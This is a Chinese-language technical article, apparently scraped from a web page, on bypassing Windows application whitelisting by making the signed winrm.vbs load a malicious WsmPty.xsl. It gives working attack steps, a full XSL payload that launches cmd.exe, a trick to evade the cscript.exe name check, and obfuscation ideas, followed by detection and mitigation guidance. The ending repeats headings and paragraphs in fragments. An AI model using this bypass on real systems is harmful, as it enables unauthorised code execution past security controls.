WinRM.vbs 应用程序白名单绕过技术分析与防御指南<\/h1>

技术概述<\/h2>
WinRM.vbs 是 Windows 系统中已签名的脚本文件，位于 System32 目录下。该脚本存在一个安全漏洞，允许攻击者通过特制的 XSL 文件绕过应用程序白名单限制，执行任意未签名代码。<\/p>

漏洞原理<\/h3>

XSL 脚本执行机制<\/strong>：当 winrm.vbs 使用 -format:pretty<\/code> 或 -format:text<\/code> 选项时，会从 cscript.exe 所在目录加载对应的 WsmPty.xsl 或 WsmTxt.xsl 文件<\/li>
不受限制的执行<\/strong>：XSL 脚本不受"开明脚本宿主"限制，可以包含任意脚本代码<\/li>

路径控制<\/strong>：攻击者可以将 cscript.exe 复制到恶意 XSL 文件所在目录，从而控制加载的 XSL 文件<\/li> <\/ol> 攻击实施步骤<\/h2> 准备阶段<\/h3> 创建攻击目录：<\/p> mkdir<\/span> %SystemDrive%\BypassDir <\/span><\/span><\/code><\/pre><\/li> 准备恶意 XSL 文件（示例为 WsmPty.xsl）：<\/p> <?xml version='1.0'?><\/span> <\/span><\/span><stylesheet<\/span> xmlns=<\/span>"http:\/\/www.w3.org\/1999\/XSL\/Transform"<\/span> <\/span><\/span> xmlns:ms=<\/span>"urn:schemas-microsoft-com:xslt"<\/span> <\/span><\/span> xmlns:user=<\/span>"placeholder"<\/span> <\/span><\/span> version=<\/span>"1.0"<\/span>><\/span> <\/span><\/span> <output<\/span> method=<\/span>"text"<\/span>><\/output><\/span> <\/span><\/span> <ms:script<\/span> implements-prefix=<\/span>"user"<\/span> language=<\/span>"JScript"<\/span>><\/span> <\/span><\/span> <![CDATA[ <\/span><\/span><\/span> var r = new ActiveXObject("WScript.Shell").Run("cmd.exe"); <\/span><\/span><\/span> ]]><\/span> <\/span><\/span> <\/ms:script><\/span> <\/span><\/span><\/stylesheet><\/span> <\/span><\/span><\/code><\/pre><\/li> 复制系统工具：<\/p> copy<\/span> %windir%\System32\cscript.exe %SystemDrive%\BypassDir <\/span><\/span><\/code><\/pre><\/li> <\/ol> 执行攻击<\/h3> %SystemDrive%\BypassDir\cscript \/\/nologo %windir%\System32\winrm.vbs get wmicimv2\/Win32_Process?Handle=4 -format:pretty <\/span><\/span><\/code><\/pre>技术变种与绕过技巧<\/h2> 绕过 cscript.exe 检查<\/h3> winrm.vbs 通过检查 WScript.FullName 是否包含 "cscript.exe" 来判断执行环境，可通过以下方式绕过：<\/p> mkdir<\/span> %SystemDrive%\BypassDir\cscript.exe <\/span><\/span>copy<\/span> %windir%\System32\wscript.exe %SystemDrive%\BypassDir\cscript.exe\winword.exe <\/span><\/span>%SystemDrive%\BypassDir\cscript.exe\winword.exe \/\/nologo %windir%\System32\winrm.vbs get wmicimv2\/Win32_Process?Handle=4 -format:pretty <\/span><\/span><\/code><\/pre>武器化 XSL 文件<\/h3> 可以将 DotNetToJScript 有效载荷嵌入 XSL 文件中，实现更复杂的攻击：<\/p> 修改 XSL 文件中的 JScript 部分<\/li> 使用 base64 编码或其他混淆技术隐藏恶意代码<\/li> 实现内存加载和执行 .NET 程序集<\/li> <\/ol> 检测方法<\/h2> 文件系统检测<\/h3> XSL 文件哈希验证<\/strong>：<\/p> 检查 WsmPty.xsl 和 WsmTxt.xsl 的哈希是否与系统原始版本一致<\/li> 这些文件应位于 System32 目录，其他位置的同名文件可疑<\/li> <\/ul> <\/li> 目录签名验证<\/strong>：<\/p> 合法的 XSL 文件采用目录签名<\/li> 检查磁盘上是否存在未签名的 WsmPty.xsl 或 WsmTxt.xsl<\/li> <\/ul> <\/li> <\/ol> 进程行为检测<\/h3> 执行上下文检测<\/strong>：<\/p> 监控从非标准路径执行的 cscript.exe 或 wscript.exe<\/li> 检查进程树，识别异常父进程<\/li> <\/ul> <\/li> 命令行参数分析<\/strong>：<\/p> 检测包含 -format:pretty<\/code> 或 -format:text<\/code> 的 winrm.vbs 调用<\/li> 注意参数变体（大小写、引号、斜杠等）<\/li> <\/ul> <\/li> <\/ol> ETW (Event Tracing for Windows) 检测<\/h3> 使用 AMSI ETW 提供程序捕获脚本执行：<\/p> logman start AMSITrace -p Microsoft-Antimalware-Scan-Interface Event1 -o AMSITrace.etl -ets <\/span><\/span># 执行可疑操作 <\/span><\/span>logman stop AMSITrace -ets <\/span><\/span><\/code><\/pre>使用 PowerShell 解析 ETW 日志：<\/p> $AMSIScanEvents = Get-WinEvent -Path .\AMSITrace.etl -Oldest -FilterXPath '*[System[EventID=1101]]'<\/span> <\/span><\/span>$AMSIScanEvents | ForEach-Object { <\/span><\/span> # 解析事件内容<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre>防御与缓解措施<\/h2> 应用程序控制<\/h3> Windows Defender 应用程序控制 (WDAC)<\/strong>：<\/p> 实施用户模式代码完整性 (UMCI)<\/li> 使用哈希黑名单阻止易受攻击的脚本版本<\/li> <\/ul> <\/li> 脚本签名验证<\/strong>：<\/p> 强制所有脚本必须经过签名<\/li> 限制未签名脚本的执行<\/li> <\/ul> <\/li> <\/ol> 系统加固<\/h3> 服务配置<\/strong>：<\/p> 禁用不必要的 WinRM 服务<\/li> 限制脚本宿主的执行权限<\/li> <\/ul> <\/li> 文件系统保护<\/strong>：<\/p> 监控 System32 目录下关键文件的修改<\/li> 限制对系统目录的写入权限<\/li> <\/ul> <\/li> <\/ol> 监控与响应<\/h3> 实时监控<\/strong>：<\/p> 部署能够检测异常脚本行为的 EDR 解决方案<\/li> 监控 XSL 文件的创建和修改<\/li> <\/ul> <\/li> 日志分析<\/strong>：<\/p> 收集和分析进程创建日志<\/li> 关注从非标准路径执行的系统工具<\/li> <\/ul> <\/li> <\/ol> 总结<\/h2> WinRM.vbs 的 XSL 加载机制漏洞为攻击者提供了一种有效的应用程序白名单绕过方法。防御者需要采取多层次的安全措施，包括应用程序控制、系统加固和全面监控，才能有效防御此类攻击。组织应评估自身环境中此类技术的潜在风险，并实施相应的检测和防护措施。<\/p>

WinRM.vbs 应用程序白名单绕过技术分析与防御指南<\/h1>

技术概述<\/h2> WinRM.vbs 是 Windows 系统中已签名的脚本文件，位于 System32 目录下。该脚本存在一个安全漏洞，允许攻击者通过特制的 XSL 文件绕过应用程序白名单限制，执行任意未签名代码。<\/p>

攻击实施步骤<\/h2>

技术变种与绕过技巧<\/h2>

检测方法<\/h2>

防御与缓解措施<\/h2>

技术概述<\/h2>
WinRM.vbs 是 Windows 系统中已签名的脚本文件，位于 System32 目录下。该脚本存在一个安全漏洞，允许攻击者通过特制的 XSL 文件绕过应用程序白名单限制，执行任意未签名代码。<\/p>